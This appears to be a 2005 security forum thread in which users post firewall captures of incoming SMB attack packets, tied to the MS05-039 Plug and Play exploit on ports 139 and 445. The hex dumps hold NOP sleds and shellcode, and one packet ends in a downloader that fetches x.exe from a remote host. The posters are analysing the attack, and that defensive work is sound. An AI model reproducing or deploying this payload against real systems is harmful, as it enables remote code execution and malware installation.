43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC 100 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC 110 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC 120 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC 130 43 23 82 04 20 03 09 00 EB 06 90 90 90 90 90 90 C#.. ........... 140 03 82 04 11 00 44 44 44 44 44 44 44 44 44 44 44 .....DDDDDDDDDDD 150 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 160 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 170 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 180 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 190 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 1A0 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 1B0 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 1C0 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 1D0 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 1E0 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 1F0 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 200 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 210 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 220 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 230 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 240 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 250 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 260 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 270 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 280 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 290 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 2A0 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 2B0 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 2C0 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 2D0 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 2E0 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 2F0 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 300 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 310 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 320 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 330 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 340 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 350 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 360 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 370 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 380 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 390 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 3A0 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 3B0 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 3C0 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 3D0 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 3E0 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 3F0 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 400 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 410 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 420 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 430 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 440 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 450 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 460 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 470 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 480 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 490 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 4A0 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 4B0 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 4C0 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 4D0 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 4E0 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 4F0 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 500 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 510 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 520 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 530 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 540 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 550 44 44 44 44 44 00 00 00 00 00 00 DDDDD...... Edit -> get the whole attack in there. Edit2 -> Typcially I see thousands of these everyday but this one actually looks interesting. Blake |
|
|
Anon users to jvmorris
Anon
2005-Aug-13 3:14 pm
to jvmorris
It is probably link to the publication of the POCs of MS flaws in one of the 0day exploits site... anyway it is related to "2005-08-11 : Microsoft Windows 2000 Plug and Play Universal Remote Exploit #1 (MS05-039)" and is targeting 139 & 445.
Fasten your seat belt... |
|
1 edit |
The usual from China: 217.44.101.66 : 24463 TCP Data In Length 1402 bytes MD5 = FDF98EF7CE39996EB14BCD33A05F76C3 ---- 13/08/2005 09:42:29.965 0 00 00 10 F8 FF 53 4D 42 2F 00 00 00 00 18 07 C8 .....SMB/....... 10 00 00 00 00 00 00 00 00 00 00 00 00 00 08 FF FE ................ 20 00 08 60 00 0E FF 00 DE DE 00 40 00 00 00 00 FF ..`.......@..... 30 FF FF FF 08 00 B8 10 00 00 B8 10 40 00 00 00 00 ...........@.... 40 00 B9 10 EE 05 00 00 01 10 00 00 00 B8 10 00 00 ................ 50 01 00 00 00 0C 20 00 00 00 00 09 00 AD 0D 00 00 ..... .......... 60 00 00 00 00 AD 0D 00 00 90 00 90 00 90 00 90 00 ................ 70 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 80 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 90 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ A0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ B0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ C0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ D0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ E0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ F0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 100 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 110 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 120 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 130 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 140 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 150 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 160 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 170 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 180 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 190 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 1A0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 1B0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 1C0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 1D0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 1E0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 1F0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 200 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 210 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 220 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 230 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 240 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 250 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 260 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 270 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 280 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 290 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 2A0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 2B0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 2C0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 2D0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 2E0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 2F0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 300 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 310 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 320 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 330 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 340 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 350 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 360 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 370 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 380 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 390 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 3A0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 3B0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 3C0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 3D0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 3E0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 3F0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 400 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 410 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 420 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 430 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 440 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 450 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 460 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 470 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 480 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 490 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 4A0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 4B0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 4C0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 4D0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 4E0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 4F0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 500 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 510 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 520 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 530 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 540 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 550 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 560 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 570 90 00 90 00 90 00 90 00 90 00 ..........
217.44.101.66 : 24463 TCP Data In Length 1402 bytes MD5 = F556F5428834E408D1434FD3EB92FFE5 ---- 13/08/2005 09:42:30.025 0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 10 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 20 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 30 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 40 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 50 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 60 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 70 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 80 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 90 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ A0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ B0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ C0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ D0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ E0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ F0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 100 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 110 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 120 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 130 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 140 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 150 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 160 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 170 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 180 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 190 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 1A0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 1B0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 1C0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 1D0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 1E0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 1F0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 200 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 210 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 220 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 230 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 240 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 250 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 260 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 270 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 280 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 290 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 2A0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 2B0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 2C0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 2D0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 2E0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 2F0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 300 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 310 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 320 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 330 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 340 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 350 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 360 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 370 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 380 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 390 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 3A0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 3B0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 3C0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 3D0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 3E0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 3F0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 400 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 410 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 420 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 430 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 440 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 450 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 460 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 470 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 480 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 490 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 4A0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 4B0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 4C0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 4D0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 4E0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 4F0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 500 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 510 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 520 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 530 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 540 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 550 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 560 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 570 90 00 90 00 90 00 90 00 90 00 ..........
217.44.101.66 : 24463 TCP Data In Length 1544 bytes MD5 = D988D4D551FF9232FEB9BDD7B9F58DF7 ---- 13/08/2005 09:42:30.075 0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 10 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 20 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 30 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 40 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 50 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 60 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 70 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 80 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 90 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ A0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ B0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ C0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ D0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ E0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ F0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 100 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 110 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 120 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 130 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 140 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 150 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 160 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 170 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 180 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 190 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 1A0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 1B0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 1C0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 1D0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 1E0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 1F0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 200 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 210 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 220 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 230 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 240 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 250 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 260 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 270 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 280 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 290 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 2A0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 2B0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 2C0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 2D0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 2E0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 2F0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 300 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 310 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 320 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 330 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 340 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 350 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 360 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 370 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 380 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 390 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 3A0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 3B0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 3C0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 3D0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 3E0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 3F0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 400 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 410 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 420 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 430 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 440 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 450 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 460 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 470 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 480 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 490 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 4A0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 4B0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 4C0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 4D0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 4E0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 4F0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 500 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 510 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 520 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 530 90 00 90 00 90 00 90 00 90 00 90 00 3C 00 12 00 ............<... 540 15 00 75 00 90 00 90 00 90 00 90 00 90 00 90 00 ..u............. 550 90 00 90 00 90 00 90 00 90 00 90 00 EB 00 58 00 ..............X. 560 68 00 74 00 74 00 70 00 3A 00 2F 00 2F 00 31 00 h.t.t.p.:././.1. 570 30 00 2E 00 33 00 2E 00 37 00 2E 00 32 00 31 00 0...3...7...2.1. 580 3A 00 37 00 34 00 36 00 37 00 2F 00 78 00 2E 00 :.7.4.6.7./.x... 590 65 00 78 00 65 00 DF 00 DF 00 DF 00 DF 00 DF 00 e.x.e........... 5A0 DF 00 DF 00 DF 00 DF 00 DF 00 DF 00 DF 00 DF 00 ................ 5B0 DF 00 DF 00 DF 00 4D 00 6F 00 7A 00 69 00 6C 00 ......M.o.z.i.l. 5C0 6C 00 61 00 2F 00 34 00 2E 00 30 00 DF 00 5D 00 l.a./.4...0...]. 5D0 33 00 C9 00 66 00 B9 00 EE 00 01 00 8D 00 75 00 3...f.........u. 5E0 05 00 8B 00 FE 00 8A 00 06 00 3C 00 99 00 75 00 ..........<...u. 5F0 05 00 46 00 8A 00 06 00 2C 00 30 00 46 00 34 00 ..F.....,.0.F.4. 600 99 00 88 00 07 00 47 00 ......G.
